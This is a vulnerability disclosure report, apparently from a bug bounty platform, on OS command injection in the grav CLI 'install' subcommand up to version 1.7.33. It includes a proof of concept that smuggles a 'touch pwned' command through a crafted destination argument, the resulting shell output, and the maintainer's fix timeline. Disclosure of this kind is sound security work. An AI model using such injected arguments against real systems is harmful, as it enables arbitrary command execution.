Local Command Injection Post-Installation of Dependencies in getgrav/grav

Valid

Reported on

May 27th 2022

Description

grav version <= 1.7.33 is vulnerable to OS command injection. The install subcommand from the grav CLI is to install the dependencies needed by Grav, and accepts only the first argument as destination where to install/clone predetermined plugin/theme repositories/dependencies from this subcommand and concatenated without any validation and used by the exec method directly.

Proof of Concept

$ export DEST='x";touch pwned #"'
$ mkdir "$DEST" # to pass dependencies check
$ cp .dependencies .htaccess "$DEST" # to pass dependencies check
$ ./bin/grav install "$DEST"
# ...SNIPPED...
# Cloning Bits
# ============
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark
#
$ find . -name "pwned"
./pwned

Found the file is created in the current working directory.

Impact

This issue leads to arbitrary command execution.

We are processing your report and will contact the getgrav/grav team within 24 hours. a year ago
Dwi Siswanto modified the report
a year ago
We have contacted a member of the getgrav/grav team and are waiting to hear back a year ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. a year ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. a year ago
Matias Griese
a year ago

Maintainer

I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.

Matias Griese modified the Severity from Medium to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability a year ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese marked this as fixed in 1.7.34 with commit de4af5 a year ago
Matias Griese has been awarded the fix bounty
This vulnerability will not receive a CVE
InstallCommand.php#L150 has been validated
to join this conversation